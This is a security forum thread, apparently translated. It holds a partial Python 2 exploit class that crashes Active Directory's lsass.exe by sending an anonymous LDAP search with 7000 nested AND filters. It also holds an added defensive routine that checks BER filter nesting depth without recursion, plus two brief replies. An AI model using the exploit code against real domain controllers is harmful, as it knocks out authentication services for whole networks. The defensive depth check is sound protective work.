Forum: Computer Clinic  Title: A look at Lsass.exe through triggering a buffer overflow
Author: qiuyang [qiuyang]    Moderator
class ActiveDirectoryDOS( Ldap ):


  def __init__(self):
      self._s = None
      self.host = '192.168.0.1'
      self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
      self.port = 389
      self.buffer = ''
      self.msg_id = 1
      # call the base-class initializer on this instance
      Ldap.__init__(self)


  def generateFilter_BinaryOp( self, filter ):
      filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
      filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
      return filterBuffer


  def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
      simpleBinOp = self.generateFilter_BinaryOp( filter )
      filterBuffer = simpleBinOp
      for cnt in range( 0, numTimes ):
        filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
      return filterBuffer



  def searchSub( self, filterBuffer ):


      self.bindRequest()
      self.searchRequest( filterBuffer )


  def run(self, host = '', basedn = '', name = '' ):


      # the machine must not exist
      machine_name = 'xaxax'


      filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)


      # execute the anonymous query
      print 'executing query'
      filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
      self.searchSub( filterBuffer )


Original poster  Posted: 04-06-15 19:59
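
The filter built in the post above wraps one equality test in 7000 nested AND layers. As an added example (not part of the original post), here is a non-recursive check a defender can run on a BER-encoded filter to reject excessive nesting before any recursive parser sees it. `MAX_DEPTH`, `read_tlv` and `filter_depth` are names assumed for this example, it is written for Python 3, and the sample bytes are constructed.

```python
MAX_DEPTH = 32  # assumed policy limit, not a value from the post

def read_tlv(buf, pos):
    """Return (tag, value_start, value_end) of the TLV starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                       # short-form length
        length = first
    else:                                  # long form: next n bytes
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("length exceeds buffer")
    return tag, pos, pos + length

def filter_depth(buf, limit=MAX_DEPTH):
    """Deepest TLV level in buf; raises ValueError once limit is passed."""
    deepest = 0
    stack = [(0, len(buf), 1)]             # explicit work list, no recursion
    while stack:
        pos, end, depth = stack.pop()
        if depth > limit and pos < end:
            raise ValueError("filter nesting exceeds limit")
        while pos < end:
            tag, vstart, vend = read_tlv(buf, pos)
            if vend > end:
                raise ValueError("child overruns parent")
            deepest = max(deepest, depth)
            if tag & 0x20:                 # constructed: descend later
                stack.append((vstart, vend, depth + 1))
            pos = vend
    return deepest

# Constructed sample: (&(&(name=xaxax)(name=xaxax))(name=xaxax))
EQ = b"\xa3\x0d\x04\x04name\x04\x05xaxax"   # equalityMatch, tag 0xA3
INNER = bytes([0xA0, len(EQ * 2)]) + EQ * 2  # AND, tag 0xA0
SAMPLE = bytes([0xA0, len(INNER + EQ)]) + INNER + EQ

if __name__ == "__main__":
    print("depth:", filter_depth(SAMPLE))
    try:
        filter_depth(SAMPLE, limit=3)
    except ValueError as err:
        print("rejected:", err)
```

Because the walk uses an explicit work list, the check's own stack usage does not grow with the nesting depth of the input it is inspecting.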

Reply: qiuyang [qiuyang]   Moderator
I originally posted this in [Core Zone] some time ago; I'm now posting it here in [Computer Clinic] for everyone to have a look.

Floor B1  Posted: 04-06-15 20:02

Reply: yao73041 [yao73041]   Forum user
I'm dizzy!!

Floor B2  Posted: 04-06-17 23:46

Copyright © 2000-2010 20CN Security Group. All Rights Reserved.